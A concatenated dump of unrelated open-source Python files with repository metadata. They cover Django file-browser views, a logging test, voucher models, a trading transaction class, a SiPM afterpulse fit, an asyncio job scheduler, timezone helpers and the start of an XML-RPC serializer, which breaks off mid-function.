}, context_instance=Context(request))
delete = staff_member_required(never_cache(delete))
# rename signals
filebrowser_pre_rename = Signal(providing_args=["path", "filename", "new_filename"])
filebrowser_post_rename = Signal(providing_args=["path", "filename", "new_filename"])
def rename(request):
"""
Rename existing File/Directory.
Includes renaming existing Image Versions/Thumbnails.
"""
from filebrowser.forms import RenameForm
# QUERY / PATH CHECK
query = request.GET
path = get_path(query.get('dir', ''))
filename = get_file(query.get('dir', ''), query.get('filename', ''))
if path is None or filename is None:
if path is None:
msg = _('The requested Folder does not exist.')
else:
msg = _('The requested File does not exist.')
request.user.message_set.create(message=msg)
return HttpResponseRedirect(reverse("fb_browse"))
abs_path = os.path.join(MEDIA_ROOT, DIRECTORY, path)
file_extension = os.path.splitext(filename)[1].lower()
if request.method == 'POST':
form = RenameForm(abs_path, file_extension, request.POST)
if form.is_valid():
relative_server_path = os.path.join(DIRECTORY, path, filename)
new_filename = form.cleaned_data['name'] + file_extension
new_relative_server_path = os.path.join(DIRECTORY, path, new_filename)
try:
# PRE RENAME SIGNAL
filebrowser_pre_rename.send(sender=request, path=path, filename=filename, new_filename=new_filename)
# DELETE IMAGE VERSIONS/THUMBNAILS
# regenerating versions/thumbs will be done automatically
for version in VERSIONS:
try:
os.unlink(os.path.join(MEDIA_ROOT, get_version_path(relative_server_path, version)))
except:
pass
# RENAME ORIGINAL
os.rename(os.path.join(MEDIA_ROOT, relative_server_path), os.path.join(MEDIA_ROOT, new_relative_server_path))
# POST RENAME SIGNAL
filebrowser_post_rename.send(sender=request, path=path, filename=filename, new_filename=new_filename)
# MESSAGE & REDIRECT
msg = _('Renaming was successful.')
request.user.message_set.create(message=msg)
redirect_url = reverse("fb_browse") + query_helper(query, "", "filename")
return HttpResponseRedirect(redirect_url)
except OSError, (errno, strerror):
form.errors['name'] = forms.util.ErrorList([_('Error.')])
else:
form = RenameForm(abs_path, file_extension)
return render_to_response('filebrowser/rename.html', {
'form': form,
'query': query,
'file_extension': file_extension,
'title': _(u'Rename "%s"') % filename,
'settings_var': get_settings_var(),
'breadcrumbs': get_breadcrumbs(query, path),
'breadcrumbs_title': _(u'Rename')
}, context_instance=Context(request))
rename = staff_member_required(never_cache(rename))
def versions(request):
"""
Show all Versions for an Image according to ADMIN_VERSIONS.
"""
# QUERY / PATH CHECK
query = request.GET
path = get_path(query.get('dir', ''))
filename = get_file(query.get('dir', ''), query.get('filename', ''))
if path is None or filename is None:
if path is None:
msg = _('The requested Folder does not exist.')
else:
msg = _('The requested File does not exist.')
request.user.message_set.create(message=msg)
return HttpResponseRedirect(reverse("fb_browse"))
abs_path = os.path.join(MEDIA_ROOT, DIRECTORY, path)
return render_to_response('filebrowser/versions.html', {
'original': path_to_url(os.path.join(DIRECTORY, path, filename)),
'query': query,
'title': _(u'Versions for "%s"') % filename,
'settings_var': get_settings_var(),
'breadcrumbs': get_breadcrumbs(query, path),
'breadcrumbs_title': _(u'Versions for "%s"') % filename
}, context_instance=Context(request))
versions = staff_member_required(never_cache(versions))
|
bsd-3-clause
| -3,435,572,908,903,204,000
| 38.509128
| 186
| 0.599446
| false
| 3.960553
| false
| false
| false
|
KSchopmeyer/smipyping
|
tests/test_logging.py
|
1
|
3914
|
#!/usr/bin/env python
# (C) Copyright 2017 Inova Development Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Test the components of the simpleping.py module
"""
from __future__ import absolute_import, print_function
import os
import unittest
import logging
# from testfixtures import log_capture
from smipyping._logging import get_logger, SmiPypingLoggers
VERBOSE = False
# Directory of this test module; the test log file is created here.
SCRIPT_DIR = os.path.dirname(__file__)
LOG_FILE_NAME = 'test_logging.log'
TEST_OUTPUT_LOG = '%s/%s' % (SCRIPT_DIR, LOG_FILE_NAME)
# TODO add test of actual logging.
class BaseLoggingTests(unittest.TestCase):
"""Base class for logging unit tests"""
def setUp(self):
SmiPypingLoggers.reset()
if os.path.isfile(TEST_OUTPUT_LOG):
os.remove(TEST_OUTPUT_LOG)
def tearDown(self):
        # Close any open logging files.
        # On Windows, log files must be closed before they can be removed.
if os.path.isfile(TEST_OUTPUT_LOG):
logger = logging.getLogger('testlogger')
if logger.handlers:
handlers = logger.handlers[:]
for handler in handlers:
handler.close()
logger.removeHandler(handler)
os.remove(TEST_OUTPUT_LOG)
def loadLogfile(self):
if os.path.isfile(TEST_OUTPUT_LOG):
with open(TEST_OUTPUT_LOG) as f:
lines = f.read().splitlines()
return lines
return None
class TestGetLogger(unittest.TestCase):
"""All test cases for get_logger()."""
def test_root_logger(self):
"""Test that get_logger('') returns the Python root logger and has at
least one handler."""
py_logger = logging.getLogger()
my_logger = get_logger('')
self.assertTrue(isinstance(my_logger, logging.Logger))
self.assertEqual(my_logger, py_logger)
self.assertTrue(len(my_logger.handlers) >= 1,
"Unexpected list of logging handlers: %r" %
my_logger.handlers)
def test_foo_logger(self):
"""Test that get_logger('foo') returns the Python logger 'foo'
and has at least one handler."""
py_logger = logging.getLogger('foo')
my_logger = get_logger('foo')
self.assertTrue(isinstance(my_logger, logging.Logger))
self.assertEqual(my_logger, py_logger)
self.assertTrue(len(my_logger.handlers) >= 1,
"Unexpected list of logging handlers: %r" %
my_logger.handlers)
class TestLoggerCreate(BaseLoggingTests):
""" Test the SmipypingLoggers.create_logger method."""
def test_create_single_logger1(self):
"""
Create a simple logger
"""
SmiPypingLoggers.prog = 'test_logging'
SmiPypingLoggers.create_logger('testlogger', log_dest='file',
log_filename=TEST_OUTPUT_LOG,
log_level='debug')
if VERBOSE:
print('smipyping_loggers dict %s' % SmiPypingLoggers.loggers)
expected_result = \
{'test_logging.testlogger': ('debug', 'file',
TEST_OUTPUT_LOG)}
self.assertEqual(SmiPypingLoggers.loggers, expected_result)
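    def test_logger_writes_to_file(self):
        """
        Hedged sketch for the TODO above: exercise a created logger and check
        that output reaches the log file. Assumes create_logger registers a
        standard Python logger named '<prog>.<name>'; adjust the name if the
        implementation differs.
        """
        SmiPypingLoggers.prog = 'test_logging'
        SmiPypingLoggers.create_logger('testlogger', log_dest='file',
                                       log_filename=TEST_OUTPUT_LOG,
                                       log_level='debug')
        logger = logging.getLogger('test_logging.testlogger')
        logger.debug('test message')
        lines = self.loadLogfile()
        self.assertTrue(lines is not None and
                        any('test message' in line for line in lines))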
if __name__ == '__main__':
unittest.main()
|
mit
| 7,747,978,183,615,586,000
| 31.616667
| 77
| 0.619315
| false
| 4.077083
| true
| false
| false
|
onepercentclub/onepercentclub-site
|
apps/vouchers/models.py
|
1
|
4574
|
import random
from django.conf import settings
from django.db import models
from django.utils.translation import ugettext as _
from django_extensions.db.fields import ModificationDateTimeField, CreationDateTimeField
from djchoices import DjangoChoices, ChoiceItem
from .mails import mail_new_voucher
class VoucherStatuses(DjangoChoices):
new = ChoiceItem('new', label=_("New"))
paid = ChoiceItem('paid', label=_("Paid"))
cancelled = ChoiceItem('cancelled', label=_("Cancelled"))
cashed = ChoiceItem('cashed', label=_("Cashed"))
cashed_by_proxy = ChoiceItem('cashed_by_proxy', label=_("Cashed by us"))
class Voucher(models.Model):
class VoucherLanguages(DjangoChoices):
en = ChoiceItem('en', label=_("English"))
nl = ChoiceItem('nl', label=_("Dutch"))
amount = models.PositiveIntegerField(_("Amount"))
currency = models.CharField(_("Currency"), max_length=3, default='EUR')
language = models.CharField(_("Language"), max_length=2, choices=VoucherLanguages.choices, default=VoucherLanguages.en)
message = models.TextField(_("Message"), blank=True, default="", max_length=500)
code = models.CharField(_("Code"), blank=True, default="", max_length=100)
status = models.CharField(_("Status"), max_length=20, choices=VoucherStatuses.choices, default=VoucherStatuses.new, db_index=True)
created = CreationDateTimeField(_("Created"))
updated = ModificationDateTimeField(_("Updated"))
sender = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_("Sender"), related_name="sender", null=True, blank=True)
sender_email = models.EmailField(_("Sender email"))
sender_name = models.CharField(_("Sender name"), blank=True, default="", max_length=100)
receiver = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_("Receiver"), related_name="receiver", null=True, blank=True)
receiver_email = models.EmailField(_("Receiver email"))
receiver_name = models.CharField(_("Receiver name"), blank=True, default="", max_length=100)
order = models.ForeignKey('fund.Order', verbose_name=_("Order"), related_name='vouchers', null=True)
class Meta:
# Note: This can go back to 'Voucher' when we figure out a proper way to do EN -> EN translations for branding.
verbose_name = _("Gift Card")
verbose_name_plural = _("Gift Cards")
def __unicode__(self):
code = "NEw"
if self.code:
code = self.code
return code
class CustomVoucherRequest(models.Model):
class CustomVoucherTypes(DjangoChoices):
card = ChoiceItem('card', label=_("Card"))
digital = ChoiceItem('digital', label=_("Digital"))
unknown = ChoiceItem('unknown', label=_("Unknown"))
class CustomVoucherStatuses(DjangoChoices):
new = ChoiceItem('new', label=_("New"))
in_progress = ChoiceItem('in progress', label=_("In progress"))
finished = ChoiceItem('finished', label=_("Finished"))
value = models.CharField(verbose_name=_("Value"), max_length=100, blank=True, default="")
number = models.PositiveIntegerField(_("Number"))
contact = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_("Contact member"), null=True)
    contact_name = models.CharField(verbose_name=_("Contact name"), max_length=100, blank=True, default="")
contact_email = models.EmailField(verbose_name=_("Contact email"), blank=True, default="")
contact_phone = models.CharField(verbose_name=_("Contact phone"), max_length=100, blank=True, default="")
organization = models.CharField(verbose_name=_("Organisation"), max_length=200, blank=True, default="")
message = models.TextField(_("message"), default="", max_length=500, blank=True)
type = models.CharField(_("type"), max_length=20, choices=CustomVoucherTypes.choices, default=CustomVoucherTypes.unknown)
status = models.CharField(_("status"), max_length=20, choices=CustomVoucherStatuses.choices, default=CustomVoucherStatuses.new, db_index=True)
created = CreationDateTimeField(_("created"))
def process_voucher_order_in_progress(voucher):
def generate_voucher_code():
# Upper case letters without D, O, L and I; numbers without 0 and 1.
char_set = 'ABCEFGHJKMNPQRSTUVWXYZ23456789'
return ''.join(random.choice(char_set) for i in range(8))
code = generate_voucher_code()
while Voucher.objects.filter(code=code).exists():
code = generate_voucher_code()
voucher.code = code
voucher.status = VoucherStatuses.paid
voucher.save()
mail_new_voucher(voucher)
|
bsd-3-clause
| 1,365,753,965,112,462,600
| 46.645833
| 146
| 0.691517
| false
| 4.005254
| false
| false
| false
|
ushatil/wellness-tracker
|
ws/wellspring/services/vest_service.py
|
1
|
1420
|
import logging
from wellspring.models import VestSection, VestSubSection
LOGGER = logging.getLogger(__name__)
VEST_SECTIONS = {
"EQUILIBRIUM" : ["SCHOOL", "SELF", "HOME", "WORK"],
"SUPPORT" : ["PROFESSIONALS", "FAMILY", "FRIENDS", "COLLEAGUES"],
"LIFESTYLE" : ["DIET", "EXERCISE", "MEDITATION", "RECREATION"]
}
def add_section(name):
LOGGER.debug("Adding VestSection: " + name)
result = VestSection(section_name=name)
result.save()
return result
def add_subsection(section_name, subsection_name):
LOGGER.debug("Adding VestSubSection: " + section_name + ":" + subsection_name)
vest_section = get_by_name_vest_section(section_name)
result = VestSubSection(vest_section=vest_section, subsection_name=subsection_name)
result.save()
return result
def get_all_vest_section():
LOGGER.debug("Getting all VestSections")
return list(VestSection.objects.all())
def get_all_vest_subsection():
LOGGER.debug("Getting all VestSubSections")
return list(VestSubSection.objects.all())
def get_by_name_vest_section(name):
LOGGER.debug("Getting VestSection by name: " + name)
    return VestSection.objects.get(section_name=name)
def get_by_name_vest_subsection(name):
LOGGER.debug("Getting VestSubSection by name: " + name)
    return VestSubSection.objects.get(subsection_name=name)
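# Hedged convenience sketch (not part of the original service): populate the
# database from the VEST_SECTIONS mapping using the helpers above.
def add_all_sections():
    for section_name, subsection_names in VEST_SECTIONS.items():
        add_section(section_name)
        for subsection_name in subsection_names:
            add_subsection(section_name, subsection_name)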
|
mit
| 4,386,219,538,674,025,000
| 35.435897
| 87
| 0.671831
| false
| 3.356974
| false
| false
| false
|
frdwrd/bifocal
|
bifocal/models/transaction.py
|
1
|
3366
|
# Copyright (c) 2013-2015, Vehbi Sinan Tunalioglu <vst@vsthost.com>
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# (See http://opensource.org/licenses/BSD-2-Clause)
from .. import utils
class Transaction(object):
def __init__(self, timestamp, quantity, asset, **kwargs):
self.quantity = quantity
try:
self.price = float(kwargs['price']) if 'price' in kwargs else 0.0
except ValueError:
raise ValueError('Invalid price: %s' % kwargs['price'])
self.timestamp = timestamp
self.asset = asset
self.data = kwargs
if type(self.quantity) is not int:
raise ValueError('Invalid quantity: %s' % self.quantity)
if type(self.timestamp) is not int:
raise ValueError('Invalid timestamp: %s' % self.timestamp)
    def __eq__(self, other):
        # Compare metadata symmetrically: extra keys on either side make the
        # transactions unequal.
        if set(self.data) != set(other.data):
            return False
        for key, value in self.data.iteritems():
            if value != other.data[key]:
                return False
if self.quantity != other.quantity:
return False
if self.price != other.price:
return False
if self.timestamp != other.timestamp:
return False
if self.asset != other.asset:
return False
return True
def __hash__(self):
return hash(repr(self))
def __repr__(self):
return "%s: %s %s @ %s" % (
utils.timestamp_to_date(self.timestamp, '%Y %m %d'),
self.quantity,
self.asset,
self.price)
def invert_quantity(self):
self.quantity = self.quantity * -1
@property
def size(self):
return abs(self.quantity)
@property
def buy(self):
return self.quantity > 0
@property
def sell(self):
return self.quantity < 0
@property
def zero(self):
return self.quantity == 0
def copy(self, quantity=None):
return Transaction(
self.timestamp,
quantity or self.quantity,
self.asset,
**self.data)
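# Hedged usage sketch (kept as comments so importing this module stays
# side-effect free; asset name and price are illustrative):
#
# buy = Transaction(1388534400, 10, 'XYZ', price='100.5')
# sell = buy.copy()
# sell.invert_quantity()
# assert buy.buy and sell.sell and buy.size == sell.size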
|
agpl-3.0
| 6,468,546,355,782,887,000
| 32.326733
| 77
| 0.645276
| false
| 4.354463
| false
| false
| false
|
ntim/g4sipm
|
sample/run/luigi/contrib/afterpulse.py
|
1
|
3367
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
from ROOT import TH1, Double, ROOT, TF1
def prob_dist_1comp(x, par):
dt = x[0]
amp = par[0]
pL = par[1]
tauL = par[2]
tauTh = par[3]
T = np.exp(-dt / tauTh)
L = np.exp(-dt / tauL)
pTot = 0
pTot += T * (1. - pL) / tauTh
pTot += T * L * pL * (1. / tauL + 1. / tauTh)
return amp * pTot
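# Full model below: short (tau_s) and long (tau_l) afterpulse components on
# top of thermal noise (tau_th). Each term is the probability density that
# the next trigger at dt comes from one particular combination of components,
# with the exponential survival factors of all components multiplied in.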
def prob_dist(x, par):
dt = x[0]
amp = par[0]
pS = par[1]
pL = par[2]
tauS = par[3]
tauL = par[4]
tauTh = par[5]
T = np.exp(-dt / tauTh)
S = np.exp(-dt / tauS)
L = np.exp(-dt / tauL)
pTot = 0
pTot += T * (1. - pS) * (1. - pL) / tauTh
pTot += T * S * pS * (1. - pL) * (1. / tauS + 1. / tauTh)
pTot += T * L * pL * (1. - pS) * (1. / tauL + 1. / tauTh)
pTot += T * S * L * pS * pL * (1. / tauS + 1. / tauL + 1. / tauTh)
return amp * pTot
def fit(h, xlow=50):
# Set default fitter.
ROOT.Math.MinimizerOptions.SetDefaultTolerance(1e-3)
ROOT.Math.MinimizerOptions.SetDefaultMinimizer("Minuit2")
ROOT.Math.MinimizerOptions.SetDefaultMaxIterations(1000)
ROOT.Math.MinimizerOptions.SetDefaultMaxFunctionCalls(1000)
ROOT.Math.MinimizerOptions.SetDefaultPrecision(1e-9)
# Fit thermal noise component.
preFit = TF1("preFit", "[0]*exp(-x/[1])", 600, h.GetBinLowEdge(h.GetNbinsX()))
preFit.SetParameter(1, 1000)
    preFit.SetParLimits(1, 10, 10000)  # tau_th between 10 ns and 10 us, i.e. thermal rates of 100 kHz to 100 MHz (assuming dt in ns)
h.Fit(preFit, "RN")
# Fit long component.
preFit2 = TF1("fitDeltaTOneComp", prob_dist_1comp, 400, h.GetBinLowEdge(h.GetNbinsX()), 4)
preFit2.SetParNames("A", "P_{l}", "#tau_{l}", "#tau_{th}")
preFit2.SetParameters(1., 0.2, 150, preFit.GetParameter(1))
preFit2.SetParLimits(1, 0.01, 1.)
preFit2.SetParLimits(2, 80., 240.)
preFit2.SetParLimits(3, preFit.GetParameter(1) - 3. * preFit.GetParError(1), preFit.GetParameter(1) + 3. * preFit.GetParError(1))
h.Fit(preFit2, "RNM")
# Fit complete distribution.
fit = TF1("fitDeltaT", prob_dist, xlow, h.GetBinLowEdge(h.GetNbinsX()), 6)
fit.SetParNames("A", "P_{s}", "P_{l}", "#tau_{s}", "#tau_{l}", "#tau_{th}")
fit.SetParameters(1., 0.2, preFit2.GetParameter(1), 50, preFit2.GetParameter(2), preFit.GetParameter(1))
fit.SetParLimits(1, 0.01, 1.)
fit.SetParLimits(2, preFit2.GetParameter(1) - 10. * preFit2.GetParError(1), preFit2.GetParameter(1) + 10. * preFit2.GetParError(1))
fit.SetParLimits(3, 10., 80.)
fit.SetParLimits(4, preFit2.GetParameter(2) - 10. * preFit2.GetParError(2), preFit2.GetParameter(2) + 10. * preFit2.GetParError(2))
fit.SetParLimits(5, preFit.GetParameter(1) - 3. * preFit.GetParError(1), preFit.GetParameter(1) + 3. * preFit.GetParError(1))
h.Fit(fit, "RNM")
h.GetListOfFunctions().Add(fit)
# Return results
amp = fit.GetParameter(0)
amp_err = fit.GetParError(0)
p_ap_s = fit.GetParameter(1)
p_ap_s_err = fit.GetParError(1)
p_ap_l = fit.GetParameter(2)
p_ap_l_err = fit.GetParError(2)
tau_s = fit.GetParameter(3)
tau_s_err = fit.GetParError(3)
tau_l = fit.GetParameter(4)
tau_l_err = fit.GetParError(4)
tau_th = fit.GetParameter(5)
tau_th_err = fit.GetParError(5)
return amp, amp_err, p_ap_s, p_ap_s_err, p_ap_l, p_ap_l_err, tau_s, tau_s_err, tau_l, tau_l_err, tau_th, tau_th_err, fit.GetChisquare(), fit.GetNDF()
|
gpl-3.0
| -5,261,657,332,472,781,000
| 40.567901
| 153
| 0.610039
| false
| 2.457664
| false
| false
| false
|
cedadev/cloudhands-burst
|
cloudhands/burst/agent.py
|
1
|
2328
|
#!/usr/bin/env python
# encoding: UTF-8
import asyncio
from collections import namedtuple
try:
from functools import singledispatch
except ImportError:
from singledispatch import singledispatch
import logging
import sqlite3
import warnings
from cloudhands.common.connectors import initialise
from cloudhands.common.connectors import Registry
Job = namedtuple("Job", ["uuid", "token", "artifact"])
class Agent:
def __init__(self, workQ, args, config):
self.work = workQ
self.args = args
self.config = config
@staticmethod
def queue(args, config, loop=None):
return asyncio.Queue(loop=loop)
@property
def callbacks(self):
raise NotImplementedError
def jobs(self, session):
raise NotImplementedError
@asyncio.coroutine
def __call__(self, loop, msgQ):
raise NotImplementedError
@singledispatch
def message_handler(msg, *args, **kwargs):
warnings.warn("No handler for {}".format(type(msg)))
pass
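# Hedged usage sketch: concrete agents register handlers for their own
# message types via singledispatch (the names below are illustrative):
#
# @message_handler.register(SomeMessage)
# def handle_some_message(msg, session):
#     return touched_object  # merged into the session by operate()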
@asyncio.coroutine
def operate(loop, msgQ, workers, args, config):
log = logging.getLogger("cloudhands.burst.operate")
session = Registry().connect(sqlite3, args.db).session
initialise(session)
tasks = [asyncio.Task(w(loop, msgQ, session)) for w in workers]
pending = set()
log.info("Starting task scheduler.")
while any(task for task in tasks if not task.done()):
yield from asyncio.sleep(0)
for worker in workers:
for job in worker.jobs(session):
if job.uuid not in pending:
pending.add(job.uuid)
log.debug("Sending {} to {}.".format(job, worker))
yield from worker.work.put(job)
pause = 0.1 if pending else 1
yield from asyncio.sleep(pause)
try:
while True:
msg = msgQ.get_nowait()
try:
act = session.merge(message_handler(msg, session))
except Exception as e:
session.rollback()
log.error(e)
else:
pending.discard(act.artifact.uuid)
session.close() # Refresh or expire not effective here
log.debug(msg)
except asyncio.QueueEmpty:
continue
|
bsd-3-clause
| -3,134,247,760,245,154,000
| 27.048193
| 75
| 0.60567
| false
| 4.36773
| false
| false
| false
|
orlenko/bccf
|
src/django_cron/timezone.py
|
1
|
8256
|
"""Timezone helper functions.
This module uses pytz when it's available and falls back to built-in
implementations when it isn't.
"""
from datetime import datetime, timedelta, tzinfo
from threading import local
import time as _time
try:
import pytz
except ImportError:
pytz = None
from django.conf import settings
__all__ = [
'utc', 'get_default_timezone', 'get_current_timezone',
'activate', 'deactivate', 'override',
'is_naive', 'is_aware', 'make_aware', 'make_naive',
]
settings.USE_TZ = False
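# (Forcing USE_TZ off means now() below always returns naive local datetimes,
# regardless of the surrounding project's setting.)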
# UTC and local time zones
ZERO = timedelta(0)
class UTC(tzinfo):
"""
UTC implementation taken from Python's docs.
Used only when pytz isn't available.
"""
def __repr__(self):
return "<UTC>"
def utcoffset(self, dt):
return ZERO
def tzname(self, dt):
return "UTC"
def dst(self, dt):
return ZERO
class LocalTimezone(tzinfo):
"""
Local time implementation taken from Python's docs.
Used only when pytz isn't available, and most likely inaccurate. If you're
having trouble with this class, don't waste your time, just install pytz.
"""
def __init__(self):
# This code is moved in __init__ to execute it as late as possible
# See get_default_timezone().
self.STDOFFSET = timedelta(seconds=-_time.timezone)
if _time.daylight:
self.DSTOFFSET = timedelta(seconds=-_time.altzone)
else:
self.DSTOFFSET = self.STDOFFSET
self.DSTDIFF = self.DSTOFFSET - self.STDOFFSET
tzinfo.__init__(self)
def __repr__(self):
return "<LocalTimezone>"
def utcoffset(self, dt):
if self._isdst(dt):
return self.DSTOFFSET
else:
return self.STDOFFSET
def dst(self, dt):
if self._isdst(dt):
return self.DSTDIFF
else:
return ZERO
def tzname(self, dt):
return _time.tzname[self._isdst(dt)]
def _isdst(self, dt):
tt = (dt.year, dt.month, dt.day,
dt.hour, dt.minute, dt.second,
dt.weekday(), 0, 0)
stamp = _time.mktime(tt)
tt = _time.localtime(stamp)
return tt.tm_isdst > 0
utc = pytz.utc if pytz else UTC()
"""UTC time zone as a tzinfo instance."""
# In order to avoid accessing the settings at compile time,
# wrap the expression in a function and cache the result.
_localtime = None
def get_default_timezone():
"""
Returns the default time zone as a tzinfo instance.
This is the time zone defined by settings.TIME_ZONE.
See also :func:`get_current_timezone`.
"""
global _localtime
if _localtime is None:
if isinstance(settings.TIME_ZONE, basestring) and pytz is not None:
_localtime = pytz.timezone(settings.TIME_ZONE)
else:
_localtime = LocalTimezone()
return _localtime
# This function exists for consistency with get_current_timezone_name
def get_default_timezone_name():
"""
Returns the name of the default time zone.
"""
return _get_timezone_name(get_default_timezone())
_active = local()
def get_current_timezone():
"""
Returns the currently active time zone as a tzinfo instance.
"""
return getattr(_active, "value", get_default_timezone())
def get_current_timezone_name():
"""
Returns the name of the currently active time zone.
"""
return _get_timezone_name(get_current_timezone())
def _get_timezone_name(timezone):
"""
Returns the name of ``timezone``.
"""
try:
# for pytz timezones
return timezone.zone
except AttributeError:
# for regular tzinfo objects
local_now = datetime.now(timezone)
return timezone.tzname(local_now)
# Timezone selection functions.
# These functions don't change os.environ['TZ'] and call time.tzset()
# because it isn't thread safe.
def activate(timezone):
"""
Sets the time zone for the current thread.
The ``timezone`` argument must be an instance of a tzinfo subclass or a
time zone name. If it is a time zone name, pytz is required.
"""
if isinstance(timezone, tzinfo):
_active.value = timezone
elif isinstance(timezone, basestring) and pytz is not None:
_active.value = pytz.timezone(timezone)
else:
raise ValueError("Invalid timezone: %r" % timezone)
def deactivate():
"""
Unsets the time zone for the current thread.
Django will then use the time zone defined by settings.TIME_ZONE.
"""
if hasattr(_active, "value"):
del _active.value
class override(object):
"""
Temporarily set the time zone for the current thread.
This is a context manager that uses ``~django.utils.timezone.activate()``
to set the timezone on entry, and restores the previously active timezone
on exit.
The ``timezone`` argument must be an instance of a ``tzinfo`` subclass, a
    time zone name, or ``None``. If it is a time zone name, pytz is required.
If it is ``None``, Django enables the default time zone.
"""
def __init__(self, timezone):
self.timezone = timezone
self.old_timezone = getattr(_active, 'value', None)
def __enter__(self):
if self.timezone is None:
deactivate()
else:
activate(self.timezone)
def __exit__(self, exc_type, exc_value, traceback):
if self.old_timezone is not None:
_active.value = self.old_timezone
else:
del _active.value
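# Hedged usage sketch for override (requires pytz for name-based lookup):
#
# with override('Europe/London'):
#     aware = datetime.utcnow().replace(tzinfo=utc)
#     local = localtime(aware)  # rendered in London time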
# Templates
def template_localtime(value, use_tz=None):
"""
Checks if value is a datetime and converts it to local time if necessary.
If use_tz is provided and is not None, that will force the value to
be converted (or not), overriding the value of settings.USE_TZ.
This function is designed for use by the template engine.
"""
should_convert = (isinstance(value, datetime)
and (settings.USE_TZ if use_tz is None else use_tz)
and not is_naive(value)
and getattr(value, 'convert_to_local_time', True))
return localtime(value) if should_convert else value
# Utilities
def localtime(value, timezone=None):
"""
Converts an aware datetime.datetime to local time.
Local time is defined by the current time zone, unless another time zone
is specified.
"""
if timezone is None:
timezone = get_current_timezone()
value = value.astimezone(timezone)
if hasattr(timezone, 'normalize'):
# available for pytz time zones
value = timezone.normalize(value)
return value
def now():
"""
Returns an aware or naive datetime.datetime, depending on settings.USE_TZ.
"""
if settings.USE_TZ:
# timeit shows that datetime.now(tz=utc) is 24% slower
return datetime.utcnow().replace(tzinfo=utc)
else:
return datetime.now()
# By design, these four functions don't perform any checks on their arguments.
# The caller should ensure that they don't receive an invalid value like None.
def is_aware(value):
"""
Determines if a given datetime.datetime is aware.
The logic is described in Python's docs:
http://docs.python.org/library/datetime.html#datetime.tzinfo
"""
return value.tzinfo is not None and value.tzinfo.utcoffset(value) is not None
def is_naive(value):
"""
Determines if a given datetime.datetime is naive.
The logic is described in Python's docs:
http://docs.python.org/library/datetime.html#datetime.tzinfo
"""
return value.tzinfo is None or value.tzinfo.utcoffset(value) is None
def make_aware(value, timezone):
"""
Makes a naive datetime.datetime in a given time zone aware.
"""
if hasattr(timezone, 'localize'):
# available for pytz time zones
return timezone.localize(value, is_dst=None)
else:
# may be wrong around DST changes
return value.replace(tzinfo=timezone)
def make_naive(value, timezone):
"""
Makes an aware datetime.datetime naive in a given time zone.
"""
value = value.astimezone(timezone)
if hasattr(timezone, 'normalize'):
# available for pytz time zones
value = timezone.normalize(value)
return value.replace(tzinfo=None)
|
unlicense
| 6,542,756,796,065,424,000
| 27.277397
| 81
| 0.645833
| false
| 4.057002
| false
| false
| false
|
asphalt-framework/asphalt-web
|
asphalt/web/rpc/xmlrpc/serialization.py
|
1
|
4239
|
import math
from base64 import b64encode, b64decode
from collections import OrderedDict
from collections.abc import Sequence, Mapping
from datetime import date, datetime
from decimal import Decimal
from typing import List, Dict, Any
from xml.sax.saxutils import escape
from asphalt.core.utils import qualified_name
from lxml.etree import Element
__all__ = ('serialize', 'deserialize')
_serializers = OrderedDict()
_deserializers = OrderedDict()
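# NOTE: registration order matters because serialize() takes the first
# isinstance() match; e.g. str and bytes must be registered before the
# generic Sequence handler, and bool before int.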
def serialize(obj) -> str:
"""
Serialize the given object into an XML-RPC ``<value>`` element.
:param obj: the object to serialize
:return: an XML fragment
"""
for cls, func in _serializers.items():
if isinstance(obj, cls):
return '<value>%s</value>' % func(obj)
raise TypeError('%s is not serializable' % qualified_name(obj.__class__))
def serializer(cls: type):
def wrapper(func):
_serializers[cls] = func
return func
return wrapper
@serializer(str)
def serialize_str(obj: str) -> str:
return '<string>%s</string>' % escape(obj)
@serializer(bool)
def serialize_bool(obj: bool) -> str:
return '<boolean>%d</boolean>' % obj
@serializer(int)
def serialize_int(obj: int) -> str:
if not -2147483648 <= obj <= 2147483647:
raise ValueError('%d is out of range of XML-RPC (32-bit) integer' % obj)
return '<i4>%d</i4>' % obj
@serializer(float)
def serialize_float(obj: float) -> str:
    if math.isnan(obj) or math.isinf(obj):
        raise ValueError('XML-RPC does not support serializing infinity or NaN float objects')
    # repr() round-trips, but exponent notation is not valid for an XML-RPC
    # <double>; expand it (the old rstrip('0') corrupted values like 1e+20).
    text = repr(obj)
    if 'e' in text or 'E' in text:
        text = format(Decimal(text), 'f')
    return '<double>%s</double>' % text
@serializer(bytes)
def serialize_bytes(obj: bytes):
return '<base64>%s</base64>' % b64encode(obj).decode()
@serializer(datetime)
def serialize_datetime(obj: datetime) -> str:
